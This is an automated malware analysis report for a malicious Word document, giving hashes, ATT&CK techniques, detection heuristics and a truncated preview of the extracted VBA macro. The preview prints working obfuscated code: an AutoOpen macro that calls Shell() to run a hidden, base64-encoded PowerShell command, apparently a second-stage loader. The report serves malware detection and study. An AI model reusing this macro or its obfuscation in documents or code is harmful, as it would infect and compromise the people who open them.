Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 082d868151e53330…

MALICIOUS

Office (OLE)

107.5 KB Created: 2018-06-08 12:50:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 8ba7dba9b150e27c9f627b0d8dafad95 SHA-1: 5d2d814cb7b730727f97d85c785e68612e482cbb SHA-256: 082d868151e53330f31cc3eeb3b4ff08757592cbf8aa42790839445edc1f5b6f
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine that calls a function which uses the Shell() command. This function attempts to construct and execute a command string, likely to download and execute a second-stage payload. The constructed command string is 'vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + hXUZAbip + dhiZTz + SjwCFiRXE', which appears to be an obfuscated attempt to run a PowerShell command.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12616 bytes
SHA-256: 18f783f27469e7d652a1968a748478fe043e59aa693b91d40390695d960a83e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GrskhWwiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjPltPav()
On Error Resume Next
For qqRiW = GhwVj To RsGzp
      For YAMGIQ = YWibTE To 48241
         KkaAsu = (88725 / CBool(rirzVT) - tTmha / Oct(66325 / Hex(86928) / hApwDb + Rnd(cRHWH / Fix(37))))
Next
   fzzwi = 30039 - 40577
Next
For QRXETl = jWwJR To tzCwqJ
      For CarwMt = UplwS To 46358
         RjStj = (80096 / CBool(vvJMqJ) - zuAnFj / Oct(48839 / Hex(81574) / YsaXnr + Rnd(BrsqcP / Fix(37))))
Next
   CHUoGf = 64246 - 73199
Next
BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765)
For kbUul = NojaJ To AJRJEK
      For VzSKj = zflvS To 21953
         mWpwSw = (97888 / CBool(dEHBGp) - wCiBU / Oct(47945 / Hex(31105) / RRkjo + Rnd(btQPQI / Fix(37))))
Next
   TVqILQ = 84446 - 86480
Next
End Function
Sub Autoopen()
On Error Resume Next
For IdWvj = QRrTVw To iiMKN
      For Kqmpj = fjntI To 15825
         fGJHN = (87205 / CBool(sczYzm) - vrIvBC / Oct(79514 / Hex(65678) / WnpWB + Rnd(dXiLz / Fix(37))))
Next
   RVazR = 32631 - 20123
Next
BjPltPav
For qOsutk = iwHFiz To mTYXvp
      For cploMd = hvkli To 111
         IvucRN = (97045 / CBool(aGOVj) - HbuVUi / Oct(28319 / Hex(46436) / FhGTw + Rnd(XTEzH / Fix(37))))
Next
   XduicB = 6659 - 28911
Next
End Sub


Attribute VB_Name = "aqznaUpQJRP"
Function mbhjLO()
On Error Resume Next
For sfkknb = FGBap To hkaiZ
      For qTLvQ = psKjNU To 90880
         wwPXXV = (70445 / CBool(kldJjp) - fiIVV / Oct(73261 / Hex(34702) / kTwziH + Rnd(tjfPN / Fix(37))))
Next
   VDLDlJ = 68172 - 49693
Next
rUdAbUdo = "HeLL -e IAAoAG" + "4AZQBX" + "AC0ATwBCAEoARQB" + "DAHQAIAAgAFMAe" + "QB" + "zAF" + "QAZQBtA"
For GHzoi = Ezaoj To fDbXC
      For OsziR = SKbzRj To 54746
         HSMozt = (55723 / CBool(phEah) - pzkjj / Oct(70869 / Hex(40131) / UcpXWU + Rnd(GhqLzH / Fix(37))))
Next
   rmZIv = 96071 - 6582
Next
DbozKaYhlw = "C4ASQBPAC4AQw" + "BPAG0AcABSAEUAc" + "wBTAGkATwBOAC4A" + "RABF" + "AGYAbABBAFQ" + "ARQBzAFQAcgBlA" + "EEAbQAo" + "AFsA"
For ZqvwU = NkArNa To kzaXIm
      For zOPjOc = wGapW To 57440
         CzcZz = (4623 / CBool(zqUkhP) - nzlnL / Oct(39995 / Hex(30785) / bLisT + Rnd(dZCqw / Fix(37))))
Next
   hzzzJk = 79839 - 4402
Next
tDLDfi = "UwB" + "ZAFMAdABF" + "AG0ALgBpAG" + "8AL"
For uzhNB = HpCLJ To rXQqGj
      For TQRtkW = nCnda To 60156
         mjMBi = (32801 / CBool(WjAfn) - qbjHC / Oct(1796 / Hex(22676) / HcFwrd + Rnd(FCYkd / Fix(37))))
Next
   FqEpbS = 48499 - 95307
Next
oJjbFO = "gBNAGUATQB" + "vA" + "FIAWQBzAHQ" + "AcgBlAG" + "EAbQB"
For ROzSiL = jaaTf To DGFnnh
      For jcuJc = kcRaim To 71213
         LrwYuL = (69128 / CBool(zKKwZ) - zkoisj / Oct(916 / Hex(79067) / opzbt + Rnd(ArjuF / Fix(37))))
Next
   PGOsVj = 19856 - 58614
Next
KzUiztjBnGr = "dAFsAcwBZ" + "AHMA" + "VABlAG0A" + "LgBjAG8AbgBWA" + "GUAUgBUAF0A" + "OgA6AGY" + "AUgBPAE0AYgB" + "BA" + "HMARQA2" + "ADQAUwB"
For zjLzfh = EuEZWY To jzkqI
      For TdCUui = ZlWAqK To 68559
         JmdOhN = (75742 / CBool(pfVqwf) - lpChQV / Oct(58783 / Hex(81817) / wDNSY + Rnd(jLoVa / Fix(37))))
Next
   Hcajf = 82658 - 23252
Next
pOGXJZJzfV = "0AHIAaQBOAEcAK" + "AAg" + "ACcAVgBa" + "AEIAdAB" + "UADgASgBB" + "AEQATQ" + "BlAC8AeQByADE" + "AWQ" + "BzAGkAMw"
For Zrhtql = ndSTi To aRdAVO
      For vJCaFj = NbzkiS To 2408
         FVUbmt = (91551 / CBool(VCvPjL) - jKcatP / Oct(79300 / Hex(13537) / GHzMjh + Rnd(MuwMHf / Fix(37))))
Next
   brAbjY = 19854 - 38483
Next
QiVKiZzuh = "BLAEw" + "AWQ" + "BaAEUAaABN" + "AFUARQBlAFQA" + "QQBZAE0AOABLAG" + "oAbwBEAEUAe" + "AB0ADEAdABoAEIA" + "KwBOAHU" + "AMwBoAF" + "UAS"
For BiNaCs = OPOjV To wjBnOj
      For kzpDR = isoIi To 56110
         KvhTHm = (38183 / CBool(iwtzXw) - RZsJaw / Oct(23599 / Hex(4394) / JIBJOa 
... (truncated)